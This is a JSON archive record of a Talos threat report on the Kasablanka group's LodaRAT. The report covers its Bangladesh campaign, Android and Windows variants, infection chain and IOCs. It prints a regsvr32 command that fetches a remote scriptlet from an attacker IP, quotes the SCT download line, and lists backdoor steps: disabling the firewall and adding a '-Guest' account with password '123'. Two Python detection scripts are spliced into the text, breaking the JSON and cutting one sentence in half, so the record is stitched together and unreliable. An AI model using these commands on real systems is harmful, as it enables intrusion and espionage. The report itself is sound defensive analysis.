{
	"id": "3da81b27-499f-49d0-a521-86944ae28d1c",
	"created_at": "2026-04-06T00:19:55.703633Z",
	"updated_at": "2026-04-10T13:12:44.647569Z",
	"deleted_at": null,
	"sha1_hash": "24211af7530ea9279fc5bb20af8324ddea37b125",
	"title": "Kasablanka Group's LodaRAT improves espionage capabilities on Android and Windows",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 733326,
	"plain_text": "Kasablanka Group's LodaRAT improves espionage capabilities on Android and Windows\r\nBy Vitor Ventura\r\nPublished: 2021-02-09 · Archived: 2026-04-05 20:35:56 UTC\r\nThe developers of LodaRAT have added Android as a targeted platform.\r\nA new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities.\r\nThe operators behind LodaRAT have been tied to a specific campaign targeting Bangladesh, although others have been seen.\r\nKasablanca, the group behind LodaRAT, seems to be motivated by information gathering and espionage rather than direct financial gain. Threat actors attempt to evolve over time and the ones behind Loda are no different. Loda now has an Android version. Just like its Windows version, the Android version is a remote access tool (RAT) with the features one would expect of this kind of malware. This Android RAT had previously been referred to as \"Gaza007.\" However, Talos linked it to the Loda developers and uncovered a full campaign targeting Bangladeshi users. This shows a resourceful adversary evolving its toolkit onto other platforms. It is unclear whether the campaign operators are the same as the developers, but there is no doubt they must work closely together. To protect against this actor, each individual in an organization must be careful with documents attached to emails and be vigilant before clicking on links. Organizations can protect themselves by monitoring domain resolutions using Umbrella, for instance, and by protecting endpoints using Cisco AMP.\r\nWhat's new?\r\nLodaRAT operators and/or developers now have a new tool, Loda4Android. This new malware follows the same principles as other Android-based RATs seen on the threat landscape. Along with this new Android variant, an updated version of Loda for Windows has been identified in the same campaign. 
These new versions, Loda4Windows and Loda4Android, show that the development effort is clearly carried out by the same group, which we are calling \"Kasablanca.\"\r\nHow did it work?\r\nTalos identified hybrid campaigns targeting Windows and Android users. The authors developed an Android-based RAT following the same principles as other RATs. However, they specifically avoided techniques often used by banking trojans, such as the Accessibility APIs. The underlying command and control (C2) protocol follows the same design pattern as the Windows version, suggesting that the C2 code handles both versions. Talos researchers have found both versions reporting to the same C2 hostname and port, further confirming this assessment.\r\nSo what?\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 1 of 11\n\nThe fact that the threat group has moved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving. Given that there is no indication that the group using LodaRAT is looking for direct financial gain (there is no related ransomware or banking activity), organizations and individuals should be aware of this threat group.\r\nThe Bangladesh campaign\r\nInfrastructure\r\nTalos has identified a campaign that started in October 2020 and was still active at the time of writing, and which now targets both Windows and Android platforms. The hostname info.v-pn[.]co was first recorded with malicious activity on July 2, 2020, when it was used as a C2 for Loda; this is the same day the domain was registered. Since then, the host has been used for malicious activity related to Loda. 
Its IP address has changed several times over the past seven months.\r\nThe Windows version (see details below) uses the IP 107.172.30[.]213 as the dropper site, which hosts the download scripts (first stage) and the main payload.\r\nFor this specific campaign, the malicious actors used the IP address 160.178.220[.]194 as a C2 and as the hosting site for the Android version in its early stages; later samples changed their C2 to info.v-pn[.]co. Based on the certificate fingerprint used to sign both Android samples, we believe the C2 recently changed to info.v-pn[.]co and that distribution is currently being carried out from a newly identified domain, lap-top[.]xyz.\r\nA development release (using the internal RFC 1918 address 192.168.1.169 as C2) signed by the same certificate was submitted anonymously to VirusTotal from the same Moroccan geographic region as the geolocation of the IP (160.178.220[.]194) used in the early stages of the campaign, which suggests that the developers of Loda4Android are potentially based in Morocco.\r\nVictimology\r\nThe operators of this Loda campaign appear to have a specific interest in Bangladesh-based organizations, namely banks and carrier-grade voice-over-IP software vendors, which we observed in several lures attempting to distribute the malware droppers. The default victim ID on the Windows version is \"munafa,\" which is the Urdu and Bengali word for \"profit.\"\r\nAmong the samples we found reporting to the same C2, Talos identified the lures outlined in the table below.\r\nThere are clear signs that each sample is being created by a common builder. All the Android samples we analyzed are signed by the same certificate and share the exact same manifest file and pre-built configuration. 
The base package is the same for all samples, \"AL-Furqan.Academy_v1.0\", a legitimate application available on the Google Play store and belonging to an Egypt-based Islamic college.\r\nInitial vector\r\nThe distribution method used in this case is very similar to what we've seen previously. Adversaries use a malicious RTF document that exploits CVE-2017-11882, a memory corruption vulnerability in Microsoft Office, which in turn downloads a malicious SCT file. For more information on how Loda has leveraged CVE-2017-11882, please see our previous post on LodaRAT.\r\nThe documents analyzed during this investigation do not employ any obfuscation. The payload for the exploit is in plain text and can be easily viewed.\r\nThe second stage of this infection chain diverges from the techniques Loda has previously employed. As shown above, the payload runs the following command:\r\nregsvr32 /s /u /n /i:hxxp://107[.]172[.]30[.]213/5[.]sct scrobj.dll\r\nThis is a known technique for bypassing AppLocker in Windows by abusing the regsvr32 command: regsvr32 is a signed Windows binary, and the /i: switch hands a URL to scrobj.dll, which fetches and runs the remote scriptlet. Using this technique, an attacker can download and execute an SCT file while bypassing AppLocker.\r\nThe malicious SCT file is essentially an XML file that contains JavaScript that downloads and executes the Loda binary. We located the GitHub repository the threat actor used as a template for the SCT file. The comments in the template were not removed from the payload used in this campaign, as seen below:\r\nThe line \"Object.Open(\"GET\", \"hxxp://107[.]172[.]30[.]213/Flash.exe\", false);\" initiates the download of the Loda binary, which is then executed.\r\nMalware\r\nMalware design similarities\r\nBefore we delve into the malware details, it's important to explain why Talos has determined with high confidence that the developers/operators behind Loda are the same as those behind this new Loda4Android sample. 
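The following is an added example and not code from the Talos post: a Python triage script that flags the regsvr32 scriptlet-download pattern described under Initial vector and parses an SCT file to recover the script body and the URLs it fetches. The SCT content is constructed for the example from the page's description (the CLSID is a placeholder) and the command lines are constructed too, using the page's 107.172.30.213 dropper address with the defanging removed.

```python
# Added example, not code from the Talos post: flag the regsvr32 scriptlet
# download used as this campaign's second stage, and parse an SCT file to
# recover its script body and the URLs it fetches.
import ntpath
import re
import xml.etree.ElementTree as ET

# Constructed scriptlet modelled on the page's description: an XML wrapper
# around JScript that fetches the Loda binary. The CLSID is a placeholder;
# the host and file name are the page's IOCs with the defanging removed.
SAMPLE_SCT = '''<?xml version='1.0'?>
<scriptlet>
<registration progid='Flash' classid='{00000000-0000-0000-0000-000000000001}'>
<script language='JScript'>
<![CDATA[
// template comments left in place, as the page notes for this campaign
var Object = new ActiveXObject('MSXML2.XMLHTTP');
Object.Open('GET', 'http://107.172.30.213/Flash.exe', false);
Object.Send();
]]>
</script>
</registration>
</scriptlet>
'''

# Permissive URL matcher; quotes and parentheses are deliberately excluded.
URL_RE = re.compile('https?://[A-Za-z0-9._~:/?#@!$&*+,;=%-]+', re.IGNORECASE)


def regsvr32_scriptlet_download(cmdline):
    '''Return details when cmdline is regsvr32 loading a remote scriptlet through
    scrobj.dll (the AppLocker bypass described above), otherwise None.'''
    argv = cmdline.split()  # real telemetry needs a Windows-aware tokenizer for quoted paths
    if not argv or ntpath.basename(argv[0]).lower() not in ('regsvr32', 'regsvr32.exe'):
        return None
    args = [a.lower() for a in argv[1:]]
    if 'scrobj.dll' not in args:
        return None
    for raw in argv[1:]:
        arg = raw.lower()
        if arg[:3] in ('/i:', '-i:') and arg[3:].startswith(('http://', 'https://')):
            return {
                'url': raw[3:],
                'silent': '/s' in args or '-s' in args,
                'unregister': '/u' in args or '-u' in args,
                'skip_dllregister': '/n' in args or '-n' in args,
            }
    return None


def parse_scriptlet(sct_text):
    '''Return the script language, body and embedded URLs of an SCT file.'''
    script = ET.fromstring(sct_text).find('.//script')
    if script is None:
        return {'language': None, 'body': '', 'urls': []}
    body = (script.text or '').strip()
    return {'language': script.get('language'), 'body': body, 'urls': URL_RE.findall(body)}


# Constructed process command lines: two benign, two matching the campaign pattern.
SAMPLE_CMDLINES = [
    'regsvr32 /s mylib.dll',
    'regsvr32 /s /i:settings.ini mylib.dll',
    'regsvr32 /s /u /n /i:http://107.172.30.213/5.sct scrobj.dll',
    'REGSVR32.EXE /S /N /I:HTTP://107.172.30.213/5.SCT SCROBJ.DLL',
]


def triage(cmdlines):
    '''Return (cmdline, details) pairs for every command line that matches.'''
    hits = []
    for line in cmdlines:
        details = regsvr32_scriptlet_download(line)
        if details:
            hits.append((line, details))
    return hits


if __name__ == '__main__':
    for line, details in triage(SAMPLE_CMDLINES):
        print('regsvr32 scriptlet download from', details['url'], '<-', line)
    info = parse_scriptlet(SAMPLE_SCT)
    print('scriptlet language:', info['language'], 'payload URLs:', info['urls'])
```

In practice the command-line check runs over process-creation telemetry (Sysmon event ID 1 or equivalent) and the parser over any .sct retrieved by a proxy or sandbox; a local /i: argument such as a .ini path does not fire, which keeps legitimate regsvr32 use out of the alert.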
Talos has found multiple similarities across the C2 protocol, code level and infrastructure. The image below shows the levels of similarity in the C2 beacon protocol.\r\nTalos also found some similarities in the beacon creation routine. Both versions have two variables with similar names and the same value, \"x,\" which are then used in the protocol in the same positions. The figure above shows the protocol layout; the table below lists each step.\r\nAs for infrastructure, Windows samples from previous Loda campaigns used the same hardcoded C2 domain as Loda4Android, on the same port.\r\nWe often find that snippets of code in malware and general app development are re-used or obtained from other sources. In this instance, we clearly see that this actor has potentially leveraged code from GitHub, which again is very common in app development. The interesting point here is that the protocol similarities are unlikely to have been copied by a different group behind Loda4Android, as this would require the Loda C2 to have the capabilities to interact with the new Android malware.\r\nLoda4Android malware\r\nMost commands are exactly what one would expect of an Android RAT and are summarized in the manifest.\r\nIt has all the components of a stalker application: the malware can record the user's location and environment audio, as well as take photos and screenshots. It can record audio calls, but only what the targeted user says, not the user on the other end of the call. 
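Added example, not code from the Talos post: a Python script that opens an APK as a zip, looks for resources that are themselves APKs (the drop-and-install behaviour behind the bindx flag described below in this section) and searches every entry for plaintext C2 host:port strings and for the hosts this report lists. The sample APK is constructed in memory from the page's description: the nested resource is named res/raw/sss, the watchlist holds the report's C2 hosts, and the 192.168.1.169:1234 string combines the page's development C2 address with a made-up port.

```python
# Added example, not code from the Talos post: triage an APK for an embedded
# APK resource (the drop-and-install behaviour behind the bindx flag) and for
# plaintext C2 host:port strings or known hosts from this report.
import io
import re
import zipfile

# Hosts from this report with defanging removed; 192.168.1.169 is the development C2 the page mentions.
WATCHLIST = ['info.v-pn.co', 'lap-top.xyz', '160.178.220.194', '192.168.1.169']
# host:port with a dotted host; [.] means a literal dot without needing an escape sequence.
HOST_PORT_RE = re.compile('([a-z0-9-]+(?:[.][a-z0-9-]+)+):([0-9]{2,5})', re.IGNORECASE)


def build_sample_apk():
    '''Construct, in memory, an APK-shaped zip matching the page's description:
    a res/raw resource named sss that is itself an APK, plus a plaintext C2 string
    in classes.dex. Port 1234 is made up; the manifests and dex bodies are placeholders.'''
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, 'w') as z:
        z.writestr('AndroidManifest.xml', 'placeholder manifest of the dropped application')
        z.writestr('classes.dex', 'placeholder dex of the dropped application')
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, 'w') as z:
        z.writestr('AndroidManifest.xml', 'placeholder manifest (binary XML in a real APK)')
        z.writestr('classes.dex', 'bindx=1 c2=192.168.1.169:1234; fallback info.v-pn.co; drop //sdcard/.app.apk')
        z.writestr('res/raw/sss', inner.getvalue())
        z.writestr('res/raw/icon.png', bytes(32))
    return outer.getvalue()


def scan_apk(apk_bytes, watchlist=WATCHLIST):
    '''Walk every zip entry and report: entries that are APKs themselves, host:port
    strings, and watchlist hosts present in the entry's bytes.'''
    findings = {'embedded_apks': [], 'c2_strings': [], 'watchlist_hits': []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            data = apk.read(name)
            if zipfile.is_zipfile(io.BytesIO(data)):
                with zipfile.ZipFile(io.BytesIO(data)) as nested:
                    members = set(nested.namelist())
                if members & {'AndroidManifest.xml', 'classes.dex'}:
                    findings['embedded_apks'].append(name)
            text = data.decode('latin-1')  # lossless byte-to-text view for substring matching
            for host, port in HOST_PORT_RE.findall(text):
                findings['c2_strings'].append((name, host + ':' + port))
            for host in watchlist:
                if host in text:
                    findings['watchlist_hits'].append((name, host))
    return findings


if __name__ == '__main__':
    for key, values in scan_apk(build_sample_apk()).items():
        print(key, values)
```

Because Loda4Android keeps its C2 hostname and port in plain text, a string sweep like this is enough to surface them from the dex; a sample that encrypted its configuration would need the decryption routine reversed first, and a nested resource that was not a plain zip would not be reported.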
The common SMS, call log and contact exfiltration functionalities are also present. Loda4Android is not capable of intercepting SMS messages or phone calls, though, as is commonly seen in banking trojans.\r\nThis RAT reads the SMS and call log from regular storage. It can also send SMS messages and place calls to specific numbers. Device-wise, it acquires a list of applications and launches them, or it can play a ringtone.\r\nThere are also two other interesting features. The first is a built-in Facebook phishing kit. At this time, its contents are hardcoded, but it should not be surprising if future versions dynamically load content targeting other platforms.\r\nThe second is a command- and script-running capability, which gives the malware the flexibility to perform a wide range of tasks. For example, it could download one of the available Android exploits and obtain root, or it could download a new APK and install it. In the latter case, user interaction is required. Talos also discovered the malware had been identified as \"Gaza007 RAT\" in an earlier public post, which contains a full list of commands with a short description of each.\r\nThe C2 hostname and port are both hardcoded in the sample in plain text. The main C2 contact loop sleeps in five-second intervals until the network is available. Once it establishes contact with the C2, it runs another loop, this time on a half-second interval.\r\nAfter starting the C2 contact service, if the bindx flag is set to 1, the malware reads a resource with the name \"sss,\" saving its contents to \"//sdcard/.app.apk\". This is then installed using the standard intent mechanism 
This is a common method to hide the installation of the malware, hoping to\r\ndisguise the malicious application by also installing legitimate software, similar to the trojanized installers used on\r\nother platforms.\r\nThe code analysis did not show any mechanism to change the bindx flag value in runtime, which suggests this is a\r\nconfiguration made at build time, a commonly used malware-building tool.\r\nWindows Loda version 1.1.8\r\nThe Windows-based samples identified during this investigation are updated versions of LodaRAT. While mostly\r\nremaining the same as previously discovered versions, new commands have been added that extend its capabilities\r\nand utilize a slightly different infection chain. The new version number of 1.1.8 can be found in the initial C2\r\nbeacon, as shown below:\r\nMultiple commands in Loda have been updated or are entirely new additions. The most notable of these\r\ncommands gives the threat actor remote access to the target machine via RDP. To achieve this, Loda first changes\r\na few security configurations in Windows:\r\nSet the registry entry \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\r\nServer\\fDenyTSConnections\" to \"0\". This will allow RDP connections to be made.\r\nTurn off the Windows firewall\r\nAdd a user called \"-Guest\" with a password of \"123\"\r\nEnable logging in via network without a password by setting the registry entry\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" to \"0\"\r\nAfter these changes are made, an unidentified networking utility named \"nx.exe\" establishes a connection on the\r\nstandard RDP port 3389. This utility was not observed during analysis, as the threat actor must send Loda a URL\r\nto download the executable from.\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 7 of 11\n\nAnother notable new command is \"Sound|\" which uses the BASS audio library to capture audio from a connected\r\nmicrophone. 
Several functions are called from a BASS audio DLL that Loda has named \"bacb.dll.\" The functions called to record audio are:\r\nBASS_ErrorGetCode\r\nBASS_RecordGetDeviceInfo\r\nBASS_RecordInit\r\nBASS_RecordSetDevice\r\nBASS_RecordFree\r\nBASS_Encode_Start\r\nBASS_Encode_Stop\r\nThis new command is an improvement on the previous \"Sound\" command, which used Windows' built-in Sound Recorder. The previous method was likely abandoned because Windows Sound Recorder can only record audio for a maximum of 60 seconds. The new method allows any recording length specified by the threat actor.\r\nFor more information on earlier versions of LodaRAT, please see our previous blogs LodaRAT grows up and LodaRAT update: Alive and well.\r\nConclusion\r\nThe threat actor behind Loda is diversifying its target platforms and continuously improving functionality. Along with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss. The group has decided to deploy cross-platform malware with additional capabilities, suggesting they have their eyes on targeting larger organizations over time. As always, we encourage users to be vigilant when clicking on or opening any links received via email or SMS message. 
This actor has made use of squatted domains to lend its lures some legitimacy; as detailed above, these are made to look similar to the real domains so that the user is lured in without noticing.\r\nCoverage\r\nIOCs\r\nURLs\r\nhxxps://lap-top[.]xyz/mobile/Lap-top%20Security_Setup.apk\r\nhxxps://av24[.]co/Virus_Cleaner_Setup.msi\r\nhxxp://bdpolice[.]co/answer-paper-demo.zip\r\nhxxps://isiamibankbd[.]com/tv/TPTUMC.exe\r\nhxxps://bangladesh-bank[.]com/PBVANA.doc\r\nhxxp://bangladesh-bank[.]com/invoice.zip\r\nhxxp://zep0de[.]com/viewticket.exe\r\nhxxp://bracbank[.]info/munafa[.]php\r\nhxxp://107[.]172[.]30[.]213/Flash.exe\r\nDomains\r\ninfo.v-pn[.]co\r\nlap-top[.]xyz\r\nav24[.]co\r\nbdpolice[.]co\r\nisiamibankbd[.]com\r\nbangladesh-bank[.]com\r\nzep0de[.]com\r\nbracbank[.]info\r\nIPs\r\n160.178.220[.]194\r\n194.5.98[.]55\r\n107.172.30[.]213\r\nHashes\r\n91b6ea9fccb4eae21335588bc83dea09780a5b7e145721f7098baafa2072286a\r\n52b6db0fec7f587505aabfe091d8e0751acd8d4f4d120eeba5519c25a6dd8673\r\n977a9d25972b999ae3b12d12e12978f4d116b5fb713c76c57998be15b4172def\r\n68b221360edf4802b470fbc86493025707cf4913cc15729f4bc6ec149a4dc7ba\r\n59f29819d223e47099ca0f00fd6bc4335d7b95188d623bf0c78c8e594c0c69c7\r\nfbb8a86f399491ea5633df62f66bec1e4d4d5531f1dff976da1a3091b8ea4f34\r\n4fa5525008128f77562fbb64af82b2fbcbc6c0afe71d567470380dc4476184a9\r\nc3afaf555eabe5e40dcb87d2c292491e561b2dadcb1998f508088ba3bcac6836\r\n677db7d296e4bea770f99f34e70be72b8a2b910b661804592202f3a4834ef102\r\n4f319b2518d855803e678713cf4b6cae975ebdd60cc1174f1609bbb9ea76f007\r\n01f44cdc139eca65f02bfe1a8918a0d073e89bc19350262dc9d10a564863fdfd\r\n7a55844f86b49e103564750a37604954590d27686f7f7bc8e5ae6101e8e18424\r\nce2276bbb6423015a4f2e80f320e068b8f53f7c19a43fb0a6f9aa5784e716d6e\r\nbf6f5a2730ced754907e277b590959d9c734681a07a466112c392e92d008fea3\r\nSource: https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html"
	],
	"report_names": [
		"kasablanka-lodarat.html"
	],
	"threat_actors": [
		{
			"id": "d4135989-e577-4133-bdae-a24243c832a4",
			"created_at": "2023-11-05T02:00:08.068657Z",
			"updated_at": "2026-04-10T02:00:03.396218Z",
			"deleted_at": null,
			"main_name": "Kasablanka",
			"aliases": [],
			"source_name": "MISPGALAXY:Kasablanka",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434795,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24211af7530ea9279fc5bb20af8324ddea37b125.pdf",
		"text": "https://archive.orkl.eu/24211af7530ea9279fc5bb20af8324ddea37b125.txt",
		"img": "https://archive.orkl.eu/24211af7530ea9279fc5bb20af8324ddea37b125.jpg"
	}
}